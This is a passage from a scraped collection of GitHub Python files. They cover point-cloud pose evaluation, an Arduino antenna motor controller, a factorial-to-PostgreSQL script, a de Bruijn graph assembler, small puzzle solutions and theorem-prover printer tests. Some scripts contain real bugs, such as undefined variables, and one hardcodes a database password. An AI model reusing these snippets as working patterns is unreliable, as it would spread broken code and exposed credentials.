class')\n parser.add_argument('--featureDim',type=int,default=32, help = 'feature 
dimension')\n parser.add_argument('--maskMethod',type=str,default='second',help='observe the second view')\n parser.add_argument('--d',type=str,default='', help = '')\n parser.add_argument('--entrySplit',type=int,default=None, help = 'use for parallel eval')\n parser.add_argument('--representation',type=str,default='skybox')\n parser.add_argument('--method',type=str,choices=['ours','ours_nc','ours_nr','super4pcs','fgs','gs','cgs'],default='ours',help='ours,super4pcs,fgs(fast global registration)')\n parser.add_argument('--useTanh', type = int, default = 1, help = 'whether to use tanh layer on feature maps')\n parser.add_argument('--saveCompletion', type = int, default = 1, help = 'save the completion result')\n parser.add_argument('--batchnorm', type = int, default = 1, help = 'whether to use batch norm in completion network')\n parser.add_argument('--skipLayer', type = int, default = 1, help = 'whether to use skil connection in completion network')\n parser.add_argument('--num_repeat', type = int, default = 1, help = 'repeat times')\n parser.add_argument('--rm',action='store_true',help='will remove previous evaluation named args.exp')\n parser.add_argument('--para', type = str, default=None,help = 'file specify parameters for pairwise matching module')\n parser.add_argument(\"-l\", \"--log\", dest=\"logLevel\", choices=['DEBUG', 'INFO', 'WARNING', 'ERROR', 'CRITICAL'], help=\"Set the logging level\")\n\n args = parser.parse_args()\n if args.d: os.environ[\"CUDA_VISIBLE_DEVICES\"] = args.d\n args.alterStep = 1 if args.method == 'ours_nr' else 3\n args.completion = 0 if args.method == 'ours_nc' else 1\n args.snumclass = 15 if 'suncg' in args.dataList else 21\n if args.logLevel:\n logging.basicConfig(level=getattr(logging, args.logLevel))\n\n print(\"\\n parameters... *******************************\\n\")\n print(f\"evaluate on {args.dataList}\")\n print(f\"using method: {args.method}\")\n print(f\"mask method: {args.maskMethod}\")\n if 'ours' in args.method:\n print(f\"output type: {args.outputType}\")\n print(f\"semantic classes: {args.snumclass}\")\n print(f\"feature dimension: {args.featureDim}\")\n print(f\"skipLayer: {args.skipLayer}\")\n print(\"\\n parameters... 
*******************************\\n\")\n time.sleep(5)\n\n\n args.rpm_para = opts()\n \n args.perStepPara = False\n if args.para is not None:\n para_val = np.loadtxt(args.para).reshape(-1,4)\n args.rpm_para.sigmaAngle1 = para_val[:,0]\n args.rpm_para.sigmaAngle2 = para_val[:,1]\n args.rpm_para.sigmaDist = para_val[:,2]\n args.rpm_para.sigmaFeat = para_val[:,3]\n args.perStepPara = True\n else:\n if args.sigmaAngle1: args.rpm_para.sigmaAngle1 = args.sigmaAngle1\n if args.sigmaAngle2: args.rpm_para.sigmaAngle2 = args.sigmaAngle2\n if args.sigmaDist: args.rpm_para.sigmaDist = args.sigmaDist\n if args.sigmaFeat: args.rpm_para.sigmaFeat = args.sigmaFeat\n\n return args\n\nif __name__ == '__main__':\n \n args = _parse_args()\n log = logging.getLogger(__name__)\n\n if not os.path.exists(\"tmp/rpe\"):\n os.makedirs(\"tmp/rpe\")\n exp_dir = f\"tmp/rpe/{args.exp}\"\n if not os.path.exists(exp_dir):\n os.makedirs(exp_dir)\n\n dataset_name,loader = getLoader(args)\n bar = Bar('Progress', max=len(loader))\n\n speedBenchmark=[]\n Overlaps = ['0-0.1','0.1-0.5','0.5-1.0']\n adstatsOverlaps = {it:[] for it in Overlaps}\n transstatsOverlaps = {it:[] for it in Overlaps}\n error_stats=[]\n if not args.rm:\n if os.path.exists(f\"{exp_dir}/{args.exp}.result.npy\"):\n error_stats+=np.load(f\"{exp_dir}/{args.exp}.result.npy\").tolist()\n n_run = len(error_stats)//100\n args.num_repeat -= n_run\n \n if 'ours' in args.method:\n # setup division point of outputs\n args.idx_f_start = 3+3+1+args.snumclass\n args.idx_f_end = args.idx_f_start + args.featureDim\n\n # initialize network and load checkpoint\n net=SCNet(args).cuda()\n try:\n if 'suncg' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/suncg.comp.pth.tar')\n elif 'matterport' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/matterport.comp.pth.tar')\n elif 'scannet' in args.dataList:\n checkpoint = torch.load('./data/pretrained_model/scannet.comp.pth.tar')\n except:\n raise Exception(\"please provide the pretrained model.\")\n\n state_dict = checkpoint['state_dict']\n net.load_state_dict(state_dict)\n net.cuda()\n\n for _ in range(args.num_repeat):\n\n for i, data in enumerate(loader):\n st = time.time()\n np.random.seed()\n\n # initialize data\n rgb,depth,R,Q,norm,imgPath,segm=data['rgb'],data['depth'],data['R'],data['Q'],data['norm'],data['imgsPath'],data['segm']\n # use origin size scan for baselines on scannet dataset \n if 'scannet' in args.dataList and 'ours' not in args.method:\n rgb,depth = data['rgb_full'], data['depth_full']\n R = torch_op.npy(R)\n rgb = torch_op.npy(rgb*255).clip(0,255).astype('uint8')\n norm = torch_op.npy(norm)\n depth = torch_op.npy(depth)\n segm = torch_op.npy(segm)\n \n R_src = R[0,0,:,:]\n R_tgt = R[0,1,:,:]\n R_gt_44 = np.matmul(R_tgt,np.linalg.inv(R_src))\n R_gt = R_gt_44[:3,:3]\n\n # generate source/target scans, point cloud\n depth_src,depth_tgt,normal_src,normal_tgt,color_src,color_tgt,pc_src,pc_tgt = util.parse_data(depth,rgb,norm,args.dataList,args.method)\n\n if len(pc_src) == 0 or len(pc_tgt)==0:\n print(f\"this point cloud file contain no point\")\n continue\n\n # compute overlap and other stats\n overlap_val,cam_dist_this,pc_dist_this,pc_nn = util.point_cloud_overlap(pc_src, pc_tgt, R_gt_44)\n overlap = '0-0.1' if overlap_val <= 0.1 else '0.1-0.5' if overlap_val <= 0.5 else '0.5-1.0'\n\n # do not test non-overlap with traditional method since make no sense.\n if args.method in ['fgs','gs','super4pcs','cgs'] and overlap_val < 0.1:\n continue\n\n # select which method to 
evaluate\n if args.method == 'super4pcs':\n R_hat = super4pcs(pc_src, pc_tgt)\n elif args.method == 'fgs':\n R_hat = open3d_fast_global_registration(pc_src,pc_tgt)\n elif args.method == 'gs':\n R_hat = open3d_global_registration(pc_src,pc_tgt)\n elif args.method == 'cgs':\n R_hat = open3d_color_registration(pc_src,pc_tgt, color_src,color_tgt)\n elif 'ours' in args.method:\n with torch.set_grad_enabled(False):\n\n data_s = {'rgb': rgb[0,0,:,:,:].transpose(1,2,0),\n 'depth': depth[0,0,:,:],\n 'normal':norm[0,0,:,:,:].transpose(1,2,0),\n 'R': R[0,0,:,:]}\n data_t = {'rgb': rgb[0,1,:,:,:].transpose(1,2,0),\n 'depth': depth[0,1,:,:],\n 'normal':norm[0,1,:,:,:].transpose(1,2,0),\n 'R': R[0,1,:,:]}\n\n R_hat = np.eye(4)\n\n # get the complete scans\n complete_s=torch.cat((torch_op.v(data['rgb'][:,0,:,:,:]),torch_op.v(data['norm'][:,0,:,:,:]),torch_op.v(data['depth'][:,0:1,:,:])),1)\n complete_t=torch.cat((torch_op.v(data['rgb'][:,1,:,:,:]),torch_op.v(data['norm'][:,1,:,:,:]),torch_op.v(data['depth'][:,1:2,:,:])),1)\n\n # apply the observation mask\n view_s,mask_s,_ = util.apply_mask(complete_s.clone(),args.maskMethod)\n view_t,mask_t,_ = util.apply_mask(complete_t.clone(),args.maskMethod)\n mask_s=torch_op.npy(mask_s[0,:,:,:]).transpose(1,2,0)\n mask_t=torch_op.npy(mask_t[0,:,:,:]).transpose(1,2,0)\n\n # append mask for valid data\n tpmask = (view_s[:,6:7,:,:]!=0).float().cuda()\n view_s=torch.cat((view_s,tpmask),1)\n tpmask = (view_t[:,6:7,:,:]!=0).float().cuda()\n view_t=torch.cat((view_t,tpmask),1)\n\n for alter_ in range(args.alterStep):\n \n # warp the second scan using current transformation estimation\n view_t2s=torch_op.v(util.warping(torch_op.npy(view_t),np.linalg.inv(R_hat),args.dataList))\n view_s2t=torch_op.v(util.warping(torch_op.npy(view_s),R_hat,args.dataList))\n # append the warped scans\n view0 = torch.cat((view_s,view_t2s),1)\n view1 = torch.cat((view_t,view_s2t),1)\n\n # generate complete scans\n f=net(torch.cat((view0,view1)))\n f0=f[0:1,:,:,:]\n f1=f[1:2,:,:,:]\n \n data_sc,data_tc={},{}\n # replace the observed region with observed depth/normal\n data_sc['normal'] = (1-mask_s)*torch_op.npy(f0[0,3:6,:,:]).transpose(1,2,0)+mask_s*data_s['normal']\n data_tc['normal'] = (1-mask_t)*torch_op.npy(f1[0,3:6,:,:]).transpose(1,2,0)+mask_t*data_t['normal']\n data_sc['normal']/= (np.linalg.norm(data_s['normal'],axis=2,keepdims=True)+1e-6)\n data_tc['normal']/= (np.linalg.norm(data_t['normal'],axis=2,keepdims=True)+1e-6)\n data_sc['depth'] = (1-mask_s[:,:,0])*torch_op.npy(f0[0,6,:,:])+mask_s[:,:,0]*data_s['depth']\n data_tc['depth'] = (1-mask_t[:,:,0])*torch_op.npy(f1[0,6,:,:])+mask_t[:,:,0]*data_t['depth']\n data_sc['obs_mask'] = mask_s.copy()\n data_tc['obs_mask'] = mask_t.copy()\n data_sc['rgb'] = (mask_s*data_s['rgb']).astype('uint8')\n data_tc['rgb'] = (mask_t*data_t['rgb']).astype('uint8')\n \n # for scannet, we use the original size rgb image(480x640) to extract sift keypoint\n if 'scannet' in args.dataList:\n data_sc['rgb_full'] = (torch_op.npy(data['rgb_full'][0,0,:,:,:])*255).astype('uint8')\n data_tc['rgb_full'] = (torch_op.npy(data['rgb_full'][0,1,:,:,:])*255).astype('uint8')\n data_sc['depth_full'] = torch_op.npy(data['depth_full'][0,0,:,:])\n data_tc['depth_full'] = torch_op.npy(data['depth_full'][0,1,:,:])\n \n # extract feature maps\n f0_feat=f0[:,args.idx_f_start:args.idx_f_end,:,:]\n f1_feat=f1[:,args.idx_f_start:args.idx_f_end,:,:]\n data_sc['feat']=f0_feat.squeeze(0)\n data_tc['feat']=f1_feat.squeeze(0)\n\n # run relative pose module to get next estimate\n if 
args.perStepPara:\n                        para_this = opts(args.rpm_para.sigmaAngle1[alter_],args.rpm_para.sigmaAngle2[alter_],args.rpm_para.sigmaDist[alter_],args.rpm_para.sigmaFeat[alter_])\n                    else:\n                        para_this = args.rpm_para\n\n                    pts3d,ptt3d,ptsns,ptsnt,dess,dest,ptsW,pttW = getMatchingPrimitive(data_sc,data_tc,dataset_name,args.representation,args.completion)\n                    # early return if too few keypoints detected\n                    if pts3d is None or ptt3d is None or pts3d.shape[0]<2 or ptt3d.shape[0]<2:\n                        logging.info(f\"no points detected or fewer than 2 keypoints detected, returning identity: {np.eye(3)}\")\n                        R_hat = np.eye(4)\n                    else:\n                        R_hat = RelativePoseEstimation_helper({'pc':pts3d.T,'normal':ptsns,'feat':dess,'weight':ptsW},{'pc':ptt3d.T,'normal':ptsnt,'feat':dest,'weight':pttW},para_this)\n\n            # average speed\n            time_this = time.time()-st\n            speedBenchmark.append(time_this)\n            \n            # compute rotation error and translation error\n            t_hat = R_hat[:3,3]\n            R_hat = R_hat[:3,:3]\n            \n            ad_this = util.angular_distance_np(R_hat, R_gt[np.newaxis,:,:])[0]\n            ad_blind_this = util.angular_distance_np(R_gt[np.newaxis,:,:],np.eye(3)[np.newaxis,:,:])[0]\n            translation_this = np.linalg.norm(np.matmul((R_hat - R_gt_44[:3,:3]),pc_src.mean(0).reshape(3)) + t_hat - R_gt_44[:3,3])\n            translation_blind_this = np.linalg.norm(t_hat - R_gt_44[:3,3])\n\n            # save result for this pair\n            R_pred_44=np.eye(4)\n            R_pred_44[:3,:3]=R_hat\n            R_pred_44[:3,3]=t_hat\n            error_stats.append({'img_src':imgPath[0][0],'img_tgt':imgPath[1][0], 'err_ad':ad_this,\n                'err_t':translation_this,'err_blind':ad_blind_this,'err_t_blind':translation_blind_this,'overlap':overlap_val,'pc_dist':pc_dist_this,\n                'cam_dist':cam_dist_this,'pc_nearest':pc_nn,'R_gt':R_gt_44,'R_pred_44':R_pred_44})\n            \n            # update statistics\n            adstatsOverlaps[overlap].append(ad_this)\n            transstatsOverlaps[overlap].append(translation_this)\n\n            # print log\n            log.info(f\"average processing time per pair: {np.sum(speedBenchmark)/len(speedBenchmark)}\")\n            log.info(f\"imgPath:{imgPath},R_hat:{R_hat}\")\n            log.info(f\"ad/ad_blind this :{ad_this}/{ad_blind_this}\\n\")\n\n            # print progress bar\n            Bar.suffix = '{dataset:10}: [{0:3}/{1:3}] | Total: {total:} | ETA: {eta:}'.format(i, len(loader), total=bar.elapsed_td, eta=bar.eta_td,dataset=dataset_name)\n            bar.next()\n            if (i+1) % 100 == 0:\n                np.save(f\"{exp_dir}/{args.exp}.result.npy\",error_stats)\n                sss=''\n                for overlap in Overlaps:\n                    sss += f\"rotation, overlap:{overlap},nobs:{len(adstatsOverlaps[overlap])}, mean:{np.mean(adstatsOverlaps[overlap])} \"\n                print(sss)\n                sss=''\n                for overlap in Overlaps:\n                    sss += f\"translation, overlap:{overlap},nobs:{len(transstatsOverlaps[overlap])}, mean:{np.mean(transstatsOverlaps[overlap])} \"\n                print(sss)\n\n            if i == args.maxIter:\n                break\n\n    np.save(f\"{exp_dir}/{args.exp}.result.npy\",error_stats)\n","repo_name":"zhenpeiyang/RelativePose","sub_path":"evaluation.py","file_name":"evaluation.py","file_ext":"py","file_size_in_byte":18205,"program_lang":"python","lang":"en","doc_type":"code","stars":149,"dataset":"github-code","pt":"72"} +{"seq_id":"32534787950","text":"\"\"\" \nThis version is designed around 2 main programs: reorientacion and motorNorte.\n\n*reorientacion takes no arguments. It just turns on the magnetometer, takes an average over each axis and computes the current angle of the antenna. 
It returns the latter rounded.\n    \n*motorNorte(arg1,arg2):\nThe motor receives in arg1 the current angle of the satellite to analyze and in arg2 the azimuthal\nangle of the antenna.\nIt works with \"AutomatizacionV2.ino\" loaded onto that board.\nIt has no return value.\n\nThis function should be run in a loop while antena.py is running.\nThe serial connection lines are probably not necessary.\n\nThe instructions are sent over serial as strings of the form \"1,0\" and \"i,j\" with i = 2,3 and j an integer.\n\n\"\"\"\n\nimport numpy as np\nimport serial, time\nimport re\n\n# Rounding correction applied to the computed degrees\ndef trunc(entrada):\n    flot = entrada - int(entrada)\n    if flot < 0.5:\n        salida = int(entrada)\n    elif flot >= 0.5:\n        salida = int(entrada) + 1\n    return salida\n\n\ndef reorientacion(arduino):\n    # Start the connection with the board over USB:\n    arduino.write(bytes('1,0', 'utf-8')) \n    data = \"\"\n    \n    print(\"Writing the IMU magnetization data...\")\n    for i in range(10):\n        print(i)\n        linea = arduino.readline().decode('utf-8')\n        data = data +linea\n    print(\"done\")\n\n\n    data2=data.replace(';', '\\n').split('\\n')\n    x = []\n    y = []\n    z = []\n\n    rango = np.arange(0, len(data2), 3) \n    rango = rango[0:-1]\n    for j in rango:\n        x =np.append(x, [float(data2[j])])\n        y= np.append(y, [float(data2[j+1])])\n        z= np.append(z, [float(data2[j+2])])\n\n    print(\"Results (microTesla):\")\n\n    mean_x =np.mean(x)\n    mean_y =np.mean(y)\n    print(mean_x,mean_y)\n    print(\"Measuring position relative to north\")\n\n    import math\n    fi_rad = math.atan(mean_x/mean_y)\n    fi_grad_1 = fi_rad*180/math.pi \n    if mean_x < 0:\n        if mean_y> 0:\n            fi_grad = fi_grad_1\n        if mean_y < 0:\n            fi_grad = fi_grad_1-180\n    if mean_x > 0:\n        if mean_y < 0:\n            fi_grad = fi_grad_1+180\n        if mean_y > 0:\n            fi_grad = fi_grad_1\n\n    print(\"North is at \", str(round(fi_grad)), \"° with respect to the IMU x axis\")\n\n    return trunc(fi_grad)\n\n\n\ndef motorNorte(angSat, angAct, arduino):\n\n    unidad = 512/360\n    deltaGrado = angSat - angAct \n    grado = trunc(deltaGrado * unidad)\n\n    if deltaGrado < 0: # If the satellite moved in the positive direction\n        orden = '2,'+str(grado)\n        print(orden) \n        arduino.write(bytes(orden, 'utf-8'))\n\n    elif deltaGrado > 0: # If the satellite moved in the negative direction\n        orden = '3,'+str(grado) \n        print(orden)\n        arduino.write(bytes(orden, 'utf-8'))\n\n\n    time.sleep(3)\n    print('Reorienting...')\n\n# These are test lines; they can be uncommented to run this program on its own without any other\n\n#azimut = reorientacion()\n#print('current azimuth: ', azimut)\n#motorNorte(0, azimut)\n#motorNorte(50,60)\n\n","repo_name":"arellana/TeledeteccionIAFE","sub_path":"VersionFinal/Mediciones/programa2_v3.py","file_name":"programa2_v3.py","file_ext":"py","file_size_in_byte":3032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"12222587275","text":"from trading_engine import *\nfrom data_processing import DataProcessing\ndp = DataProcessing([])\n\n\nfilename = r'data for trading\\streaming live prices.csv'\ninit_flags_and_order_ids(filename)\n\nwhile True:\n    crossover_strategy(filename)","repo_name":"kesler20/trading_bot","sub_path":"trading_bot_test.py","file_name":"trading_bot_test.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17417160106","text":"archivo=open(\"Factorial7.txt\",\"a\")\r\nimport psycopg2\r\n\r\ndef ingreso():\r\n    try:\r\n        entrada = 
int(input(\"Ingrese el numero que desea calcular:\"));\r\n \r\n except:\r\n print(\"Error, ingrese valores numericos\\n\")\r\n entrada=ingreso()\r\n return entrada\r\n\r\ndef verificar():\r\n entrada=ingreso()\r\n cociente, residuo = divmod(entrada, 7)\r\n\r\n if(residuo==0 and cociente>0):\r\n factorial = 1\r\n valor=entrada\r\n for i in range(entrada):\r\n factorial=factorial*entrada\r\n entrada=entrada-1\r\n \r\n\r\n conexion1 = psycopg2.connect(database=\"Prueba\", user=\"postgres\", password=\"usac21\")\r\n cursor1=conexion1.cursor()\r\n sql=\"insert into factorial7(valor, factorial) values (%s,%s)\"\r\n datos=(valor, factorial)\r\n cursor1.execute(sql, datos)\r\n conexion1.commit()\r\n conexion1.close() \r\n print (\"El fatorial es\",factorial,\"****Registro Almacenado****\\n\")\r\n \r\n\r\n \r\n elif(reciduo!=0 or cociente==0):\r\n print(\"El numero ingresado no es mutiplo de 7\\n\")\r\n\r\n \r\n\r\nverificar()\r\narchivo.close()\r\n","repo_name":"HeinzVelasquez/PAIE","sub_path":"Factorial mutiplo de 7.py","file_name":"Factorial mutiplo de 7.py","file_ext":"py","file_size_in_byte":1122,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43999573325","text":"\r\nfrom collections import defaultdict\r\nimport networkx as nx\r\nwith open('1-kmers.txt') as f:\r\n lines = f.read().splitlines()\r\n edges = list()\r\n for line in lines:\r\n edges.append( (line[0:(len(line)-1)],line[1:len(line)]))\r\n\r\nprint(edges)\r\n\r\ngraph = nx.Graph()\r\ngraph.add_edges_from(edges)\r\nprint(graph.edges())\r\nprint(graph.nodes())\r\n\r\ndegrees = defaultdict(int)\r\nfor k in graph:\r\n print(k)\r\n for v in graph[k]:\r\n print(v)\r\n degrees[k] += 1\r\n degrees[v] -= 1\r\nsource = [k for k, v in degrees.items() if v == 1]\r\nsinc = [k for k, v in degrees.items() if v == -1]\r\n#print 'source: %s, sinc: %s' % (source, sinc)\r\n\r\nif sinc in graph.nodes():\r\n graph.add_edge(sink,source)\r\nelse:\r\n graph.add_node(sink)\r\n graph.add_edge(sink,source)\r\n\r\ncycles = {}\r\nwhile graph:\r\n current = next(iter(graph))\r\n cycle = [current]\r\n cycles[current] = cycle\r\n while current in graph:\r\n next_ = graph[current][0]\r\n del graph[current][0]\r\n if len(graph[current]) == 0:\r\n del graph[current]\r\n current = next_\r\n cycle.append(next_)\r\n\r\n\r\ndef traverse(tree, root):\r\n out = []\r\n for r in tree[root]:\r\n if r != root and r in tree:\r\n out += traverse(tree, r)\r\n else:\r\n out.append(r)\r\n return out\r\n\r\ncycle = traverse(cycles, 0)\r\nfor i in range(1, len(cycle)):\r\n if cycle[i-1] == sinc and cycle[i] == source:\r\n boarder = i\r\npath = cycle[boarder:]+cycle[1:boarder]\r\nprint ('->'.join([str(i) for i in path]))","repo_name":"SparshAgarwal/BioInformatics","sub_path":"HW1/PA2.py","file_name":"PA2.py","file_ext":"py","file_size_in_byte":1536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26679709830","text":"# Submission Link : https://leetcode.com/submissions/detail/230781316/\n\nclass Solution(object):\n def isAnagram(self, s, t):\n \"\"\"\n :type s: str\n :type t: str\n :rtype: bool\n \"\"\"\n \n s = sorted(s)\n t = sorted(t)\n if s == t:\n return True\n else:\n return False\n \n","repo_name":"prateekiiest/Competitive-Programming-Algo-DS","sub_path":"LeetCode/valid_anagram.py","file_name":"valid_anagram.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} 
+{"seq_id":"72582018474","text":"import math\nimport numpy\n\ndef lines():\n with open(\"5.txt\") as fp:\n return fp.readlines()\n\ndef process_lines():\n post = []\n for a in lines():\n post.append(a)\n return post\n\n# First 7 makes a binary number\n# Last 3 makes a binary number\n# first 7 times 8 is just move 3 digits to the left\n# So the whole thing is just a binary number\n\nlines = process_lines()\n\n# lines = [\"BFFFBBFRRR\", \"FFFBBBFRRR\", \"BBFFBBFRLL\", \"FBFBBFFRLR\"]\nres = []\n\n\nfor l in lines:\n r = l.replace('F', '0')\n r = r.replace('B', '1')\n r = r.replace('L', '0')\n r = r.replace('R', '1')\n\n res.append(int(r, 2))\nprint(max(res))\n \n","repo_name":"Barisimre/AoC2020","sub_path":"5_1.py","file_name":"5_1.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21785892179","text":"# Author: Bohua Zhan\n\nimport unittest\n\nfrom kernel.type import TVar, Type, TFun, boolT\nfrom kernel.term import Var, Const, Comb, Abs, Bound, Term\nfrom kernel.thm import Thm\nfrom logic import logic\nfrom logic import nat\nfrom logic import list\nfrom logic import set\nfrom logic import basic\nfrom logic import function\nfrom syntax import printer\n\nthy = basic.load_theory('list')\n\nA = Var(\"A\", boolT)\nB = Var(\"B\", boolT)\nC = Var(\"C\", boolT)\nTa = TVar(\"a\")\na = Var(\"a\", Ta)\nb = Var(\"b\", Ta)\nP = Var(\"P\", TFun(Ta, boolT))\nQ = Var(\"Q\", TFun(Ta, boolT))\nR = Var(\"R\", TFun(Ta, Ta, boolT))\nf = Var(\"f\", TFun(Ta, Ta))\nnn = Var(\"n\", TFun(boolT, boolT))\nm = Var(\"m\", nat.natT)\nn = Var(\"n\", nat.natT)\np = Var(\"p\", nat.natT)\nxs = Var(\"xs\", Type(\"list\", Ta))\nys = Var(\"ys\", Type(\"list\", Ta))\nzs = Var(\"zs\", Type(\"list\", Ta))\neq = Term.mk_equals\nimp = Term.mk_implies\nconj = logic.mk_conj\ndisj = logic.mk_disj\nabs = Term.mk_abs\nall = Term.mk_all\nneg = logic.neg\nexists = logic.mk_exists\nmk_if = logic.mk_if\n\nclass PrinterTest(unittest.TestCase):\n def testPrintLogical(self):\n test_data = [\n # Equality and implies\n (eq(a, b), \"a = b\"),\n (imp(A, B), \"A --> B\"),\n (imp(A, B, C), \"A --> B --> C\"),\n (imp(imp(A, B), C), \"(A --> B) --> C\"),\n (imp(A, eq(a, b)), \"A --> a = b\"),\n (eq(imp(A, B), imp(B, C)), \"(A --> B) = (B --> C)\"),\n (eq(A, eq(B, C)), \"A = (B = C)\"),\n (eq(eq(A, B), C), \"A = B = C\"),\n\n # Conjunction and disjunction\n (conj(A, B), \"A & B\"),\n (disj(A, B), \"A | B\"),\n (conj(A, conj(B, C)), \"A & B & C\"),\n (conj(conj(A, B), C), \"(A & B) & C\"),\n (disj(A, disj(B, C)), \"A | B | C\"),\n (disj(disj(A, B), C), \"(A | B) | C\"),\n (disj(conj(A, B), C), \"A & B | C\"),\n (conj(disj(A, B), C), \"(A | B) & C\"),\n (disj(A, conj(B, C)), \"A | B & C\"),\n (conj(A, disj(B, C)), \"A & (B | C)\"),\n (disj(conj(A, B), conj(B, C)), \"A & B | B & C\"),\n (conj(disj(A, B), disj(B, C)), \"(A | B) & (B | C)\"),\n\n # Negation\n (neg(A), \"~A\"),\n (neg(neg(A)), \"~~A\"),\n\n # Constants\n (logic.true, \"true\"),\n (logic.false, \"false\"),\n\n # Mixed\n (imp(conj(A, B), C), \"A & B --> C\"),\n (imp(A, disj(B, C)), \"A --> B | C\"),\n (conj(A, imp(B, C)), \"A & (B --> C)\"),\n (disj(imp(A, B), C), \"(A --> B) | C\"),\n (neg(conj(A, B)), \"~(A & B)\"),\n (neg(imp(A, B)), \"~(A --> B)\"),\n (neg(eq(A, B)), \"~A = B\"),\n (eq(neg(A), B), \"(~A) = B\"),\n (eq(neg(A), neg(B)), \"(~A) = (~B)\"),\n\n # Abstraction\n (abs(a, conj(P(a),Q(a))), \"%a. P a & Q a\"),\n\n # Quantifiers\n (all(a, P(a)), \"!a. 
P a\"),\n (all(a, all(b, conj(P(a),P(b)))), \"!a. !b. P a & P b\"),\n (all(a, conj(P(a), Q(a))), \"!a. P a & Q a\"),\n (conj(all(a, P(a)), Q(a)), \"(!a. P a) & Q a\"),\n (all(a, imp(P(a), Q(a))), \"!a. P a --> Q a\"),\n (imp(all(a, P(a)), Q(a)), \"(!a. P a) --> Q a\"),\n (imp(all(a, P(a)), all(a, Q(a))), \"(!a. P a) --> (!a. Q a)\"),\n (imp(exists(a, P(a)), exists(a, Q(a))), \"(?a. P a) --> (?a. Q a)\"),\n (eq(A, all(a, P(a))), \"A = (!a. P a)\"),\n (exists(a, P(a)), \"?a. P a\"),\n (exists(a, all(b, R(a, b))), \"?a. !b. R a b\"),\n (all(a, exists(b, R(a, b))), \"!a. ?b. R a b\"),\n\n # If\n (mk_if(A, a, b), \"if A then a else b\"),\n (eq(mk_if(A, a, b), a), \"(if A then a else b) = a\"),\n (mk_if(A, P, Q), \"if A then P else Q\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintFunction(self):\n test_data = [\n (P(a), \"P a\"),\n (P(f(a)), \"P (f a)\"),\n (R(a,a), \"R a a\"),\n (nn(conj(A,B)), \"n (A & B)\"),\n (conj(nn(A), B), \"n A & B\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintArithmetic(self):\n test_data = [\n (nat.plus(m, n), \"m + n\"),\n (nat.plus(nat.plus(m, n), p), \"m + n + p\"),\n (nat.plus(m, nat.plus(n, p)), \"m + (n + p)\"),\n (nat.times(m, n), \"m * n\"),\n (nat.times(nat.times(m, n), p), \"m * n * p\"),\n (nat.times(m, nat.times(n, p)), \"m * (n * p)\"),\n (nat.plus(m, nat.times(n, p)), \"m + n * p\"),\n (nat.times(m, nat.plus(n, p)), \"m * (n + p)\"),\n (nat.zero, \"0\"),\n (nat.plus(nat.zero, nat.zero), \"0 + 0\"),\n (nat.times(m, nat.zero), \"m * 0\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testBinary(self):\n test_data = [\n (nat.one, \"1\"),\n (nat.bit0(nat.one), \"2\"),\n (nat.bit1(nat.one), \"3\"),\n (nat.Suc(nat.one), \"Suc 1\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintList(self):\n nil = list.nil\n cons = list.mk_cons\n append = list.mk_append\n test_data = [\n (append(xs, ys), \"xs @ ys\"),\n (append(append(xs, ys), zs), \"(xs @ ys) @ zs\"),\n (append(xs, append(ys, zs)), \"xs @ ys @ zs\"),\n (cons(a, nil(Ta)), \"[a]\"),\n (cons(a, cons(b, nil(Ta))), \"[a, b]\"),\n (cons(a, xs), \"a # xs\"),\n (append(cons(a, nil(Ta)), cons(b, nil(Ta))), \"[a] @ [b]\"),\n (cons(a, append(xs, ys)), \"a # xs @ ys\"),\n (append(cons(a, xs), ys), \"(a # xs) @ ys\"),\n (list.cons(Ta)(a), \"cons a\"),\n ]\n\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintSet(self):\n A = Var(\"A\", set.setT(Ta))\n B = Var(\"B\", set.setT(Ta))\n x = Var(\"x\", Ta)\n test_data = [\n (set.empty_set(Ta), \"({}::'a set)\", \"(∅::'a set)\"),\n (set.mk_mem(x, A), \"x MEM A\", \"x ∈ A\"),\n (set.mk_subset(A, B), \"A SUB B\", \"A ⊆ B\"),\n (set.mk_inter(A, B), \"A INTER B\", \"A ∩ B\"),\n (set.mk_union(A, B), \"A UNION B\", \"A ∪ B\"),\n ]\n\n for t, s1, s2 in test_data:\n self.assertEqual(printer.print_term(thy, t), s1)\n self.assertEqual(printer.print_term(thy, t, unicode=True), s2)\n\n def testPrintFunction(self):\n test_data = [\n (function.mk_fun_upd(f, a, b), \"(f)(a := b)\"),\n (function.mk_fun_upd(f, a, b, b, a), \"(f)(a := b, b := a)\"),\n ]\n\n thy = basic.load_theory('function')\n for t, s in test_data:\n self.assertEqual(printer.print_term(thy, t), s)\n\n def testPrintWithType(self):\n test_data = [\n (list.nil(Ta), \"([]::'a list)\"),\n (eq(list.nil(Ta), list.nil(Ta)), \"([]::'a list) = []\"),\n (all(a, eq(a, a)), \"!a::'a. 
